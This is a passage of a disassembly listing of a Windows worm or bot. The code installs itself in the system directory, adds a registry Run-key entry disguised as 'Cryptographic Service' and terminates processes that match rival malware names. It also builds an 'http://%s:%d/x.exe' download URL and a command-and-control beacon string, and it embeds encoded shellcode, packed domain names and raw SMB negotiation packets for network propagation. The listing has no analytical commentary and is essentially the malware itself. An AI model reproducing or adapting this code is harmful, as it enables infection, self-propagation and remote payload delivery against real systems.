push offset dword_31425004
mov byte ptr [ebp+arg_0+3], al
call dword_314210D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31421801
test eax, eax
pop ecx
jnz short loc_31422624
push [ebp+arg_0]
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_31422624: ; CODE XREF: sub_314225C3+50�j
movzx edi, word_3142500C
call esi ; dword_314210FC
cdq
idiv edi
add edx, edi
push edx
call dword_31421094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_314225E1
loc_31422642: ; CODE XREF: sub_314225C3+25�j
; sub_314225C3+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31422647: ; CODE XREF: sub_314225C3+C�j
pop ebp
retn 4
sub_314225C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142264B proc near ; DATA XREF: UPX0:3142281B�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31421EFB
call sub_3142239E
test eax, eax
jnz loc_31422704
push ebx
mov ebx, dword_31421094
push esi
mov esi, dword_314210FC
push edi
loc_31422671: ; CODE XREF: sub_3142264B+48�j
; sub_3142264B+B0�j
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+1], al
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+3], al
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+2], al
loc_31422680: ; CODE XREF: sub_3142264B+3C�j
call esi ; dword_314210FC
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31422680
call sub_31421FF9
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31422671
call sub_31422038
test eax, eax
jz short loc_314226DC
push offset dword_31425004
call dword_314210D4 ; InterlockedIncrement
push edi
call sub_31421801
test eax, eax
pop ecx
jnz short loc_314226E3
push edi
push offset sub_3142255F
call sub_31421F52
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_314226C8: ; CODE XREF: sub_3142264B+8D�j
push edi
push offset sub_314225C3
call sub_31421F52
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_314226C8
jmp short loc_314226E3
; ---------------------------------------------------------------------------
loc_314226DC: ; CODE XREF: sub_3142264B+51�j
push 2710h
call ebx ; dword_31421094
loc_314226E3: ; CODE XREF: sub_3142264B+67�j
; sub_3142264B+8F�j
movzx edi, word_3142500C
call esi ; dword_314210FC
cdq
idiv edi
add edx, edi
push edx
call ebx ; dword_31421094
call sub_3142239E
test eax, eax
jz loc_31422671
pop edi
pop esi
pop ebx
loc_31422704: ; CODE XREF: sub_3142264B+11�j
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_3142264B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422712 proc near ; CODE XREF: UPX0:314227E0�p
; UPX0:loc_31422846�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31421FF9
push eax
call dword_3142115C ; inet_ntoa
mov esi, dword_31421068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; dword_31421068
push dword_31424FFC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3142111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314242BA
call esi ; dword_31421068
push offset byte_314242B8
call dword_31421084 ; lstrlenA
mov byte_314242B8[eax], 0DFh
pop esi
leave
retn
sub_31422712 endp
; ---------------------------------------------------------------------------
loc_3142276E: ; DATA XREF: sub_314223B2+166�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31425004, ebx
call sub_31422038
mov esi, dword_31421094
mov edi, 1388h
test eax, eax
jnz short loc_3142279C
loc_31422790: ; CODE XREF: UPX0:3142279A�j
push edi
call esi ; dword_31421094
call sub_31422038
test eax, eax
jz short loc_31422790
loc_3142279C: ; CODE XREF: UPX0:3142278E�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31421130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31425008, ebx
pop ebp
mov word_3142500C, 96h
jz short loc_314227D9
mov dword_31425008, 1
mov ebp, 15Eh
mov word_3142500C, 14h
loc_314227D9: ; CODE XREF: UPX0:314227BF�j
call sub_31421FF9
mov ebx, eax
call sub_31422712
cmp ebx, 100007Fh
jz short loc_314227FA
push ebx
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_314227FA: ; CODE XREF: UPX0:314227EB�j
mov dword ptr [esp+10h], 4
loc_31422802: ; CODE XREF: UPX0:31422813�j
push ebx
push offset sub_314225C3
call sub_31421F52
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31422802
test ebp, ebp
jle short loc_3142282A
loc_31422819: ; CODE XREF: UPX0:31422828�j
push 0
push offset sub_3142264B
call sub_31421F52
pop ecx
dec ebp
pop ecx
jnz short loc_31422819
loc_3142282A: ; CODE XREF: UPX0:31422817�j
; UPX0:31422836�j ...
call sub_31422038
test eax, eax
jz short loc_31422838
push edi
call esi ; dword_31421094
jmp short loc_3142282A
; ---------------------------------------------------------------------------
loc_31422838: ; CODE XREF: UPX0:31422831�j
; UPX0:31422844�j
call sub_31422038
test eax, eax
jnz short loc_31422846
push edi
call esi ; dword_31421094
jmp short loc_31422838
; ---------------------------------------------------------------------------
loc_31422846: ; CODE XREF: UPX0:3142283F�j
call sub_31422712
jmp short loc_3142282A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142284D proc near ; CODE XREF: sub_314229E6+93�p
; sub_31422B67+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31422880
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
loc_31422880: ; CODE XREF: sub_3142284D+1C�j
pop ebp
retn
sub_3142284D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422882 proc near ; CODE XREF: sub_314221C4+33�p
; sub_314229E6+84�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jz short loc_314228AE
push 1
pop eax
jmp short loc_314228D8
; ---------------------------------------------------------------------------
loc_314228AE: ; CODE XREF: sub_31422882+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31421008 ; RegQueryValueExA
test eax, eax
jz short loc_314228CD
push 2
pop esi
loc_314228CD: ; CODE XREF: sub_31422882+46�j
push [ebp+arg_10]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_314228D8: ; CODE XREF: sub_31422882+2A�j
pop esi
leave
retn
sub_31422882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314228DB proc near ; CODE XREF: sub_31422A9B+96�p
; sub_31422B67+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421000 ; RegCreateKeyExA
test eax, eax
jz short loc_31422904
push 1
pop eax
jmp short loc_3142292B
; ---------------------------------------------------------------------------
loc_31422904: ; CODE XREF: sub_314228DB+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421004 ; RegSetValueExA
test eax, eax
jz short loc_31422920
push 2
pop esi
loc_31422920: ; CODE XREF: sub_314228DB+40�j
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_3142292B: ; CODE XREF: sub_314228DB+27�j
pop esi
pop ebp
retn
sub_314228DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142292E proc near ; CODE XREF: sub_314229E6+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31421084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_314229E2
loc_3142294E: ; CODE XREF: sub_3142292E+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31422957
dec esi
jns short loc_3142294E
loc_31422957: ; CODE XREF: sub_3142292E+24�j
push 0
push 2
call sub_31422D2C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_314229E2
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31422D26 ; Process32First
test eax, eax
jz short loc_314229E2
lea esi, [esi+ebx+1]
loc_3142299F: ; CODE XREF: sub_3142292E+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31421104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_314229CF
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314210B0 ; OpenProcess
push 0
push eax
call dword_31421060 ; TerminateProcess
loc_314229CF: ; CODE XREF: sub_3142292E+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31422D20 ; Process32Next
test eax, eax
jnz short loc_3142299F
loc_314229E2: ; CODE XREF: sub_3142292E+1A�j
; sub_3142292E+38�j ...
pop esi
pop ebx
leave
retn
sub_3142292E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314229E6 proc near ; CODE XREF: UPX0:3142237B�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31422A56: ; CODE XREF: sub_314229E6+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422A8D
push ebx
push edi
push esi
call sub_3142284D
lea eax, [ebp+var_13C]
push eax
call sub_3142292E
add esp, 10h
loc_31422A8D: ; CODE XREF: sub_314229E6+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31422A56
pop edi
pop esi
pop ebx
leave
retn
sub_314229E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1�p
; sub_31422B67+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31422AB0
push [ebp+arg_0]
call dword_31421074 ; DeleteFileA
loc_31422AB0: ; CODE XREF: sub_31422A9B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3142108C ; GetSystemDirectoryA
test eax, eax
jz locret_31422B65
push esi
call dword_314210FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31421F73
mov esi, dword_31421088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314241F0
push eax
call esi ; dword_31421088
lea eax, [ebp+var_78]
push offset dword_314241F8
push eax
call esi ; dword_31421088
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; dword_31421088
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31421050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31421084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_314228DB
add esp, 14h
push dword_31424FF4
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31421054 ; WinExec
push 1F4h
call dword_31421094 ; Sleep
push 0
call dword_314210E0 ; ExitProcess
pop esi
locret_31422B65: ; CODE XREF: sub_31422A9B+23�j
leave
retn
sub_31422A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422B67 proc near ; CODE XREF: UPX0:31422380�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31421048 ; GetModuleFileNameA
test eax, eax
jz loc_31422CA0
and dword_31425010, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422BED
call dword_314210FC ; rand
push 0Ah
mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31421F73
pop ecx
pop ecx
push ebx
call dword_31421084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_314228DB
add esp, 14h
jmp short loc_31422BFC
; ---------------------------------------------------------------------------
loc_31422BED: ; CODE XREF: sub_31422B67+4D�j
lea eax, [ebp+var_20]
push eax
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
call dword_31421068 ; lstrcpyA
loc_31422BFC: ; CODE XREF: sub_31422B67+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422C42
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_314228DB
lea eax, [ebp+var_84]
push eax
push 0
call sub_31422A9B
add esp, 1Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C42: ; CODE XREF: sub_31422B67+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3142104C ; lstrcmpiA
test eax, eax
jnz short loc_31422C8B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422CA0
push ebx
push edi
push esi
mov dword_31425010, 1
call sub_3142284D
add esp, 0Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C8B: ; CODE XREF: sub_31422B67+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31422A9B
pop ecx
pop ecx
loc_31422CA0: ; CODE XREF: sub_31422B67+1F�j
; sub_31422B67+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31422B67 endp
; =============== S U B R O U T I N E =======================================
sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CA�p
; sub_314215C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31421044 ; VirtualAlloc
retn
sub_31422CA5 endp
; =============== S U B R O U T I N E =======================================
sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10B�p
; sub_314215C7+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31421040 ; VirtualFree
retn
sub_31422CB9 endp
; ---------------------------------------------------------------------------
align 10h
loc_31422CD0: ; DATA XREF: sub_31421422+A�o
; sub_314223B2+A�o
jmp dword ptr loc_31421100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CD6 proc near ; CODE XREF: sub_31421801+128�p
; sub_31421801+134�p ...
jmp dword_314210F8
sub_31422CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CDC proc near ; CODE XREF: sub_31421801+9C�p
; sub_31421801+C5�p ...
jmp dword_314210F4
sub_31422CDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CE2 proc near ; CODE XREF: sub_31421801+93�p
; sub_31421801+B2�p ...
jmp dword_314210F0
sub_31422CE2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31422CF0 proc near ; CODE XREF: sub_31421801+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31422D10
loc_31422CFC: ; CODE XREF: sub_31422CF0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31422CFC
loc_31422D10: ; CODE XREF: sub_31422CF0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31422CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D20 proc near ; CODE XREF: sub_3142292E+AB�p
jmp dword_31421064
sub_31422D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D26 proc near ; CODE XREF: sub_3142292E+64�p
jmp dword_3142105C
sub_31422D26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D2C proc near ; CODE XREF: sub_3142292E+2D�p
jmp dword_31421058
sub_31422D2C endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4B3h dup(0)
dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31421422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314215C7+84�o
align 10h
byte_31424080 db 0 ; DATA XREF: sub_314216A2+1B�r
off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23�r
align 2
dd offset dword_314241D4
dw 0C401h
dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h
dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h
dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h
dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h
dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h
dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314241E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314241F0 dd 6578652Eh, 0 ; sub_3142207E+55�o ...
dword_314241F8 dd 5Ch ; sub_31422A9B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314211A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19&cnt=%s',0
; DATA XREF: sub_314215C7+57�o
align 8
byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24E�o
; sub_31421801+260�o ...
db 58h
word_314242BA dw 7468h ; DATA XREF: sub_31422712+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31421801+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31421801+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
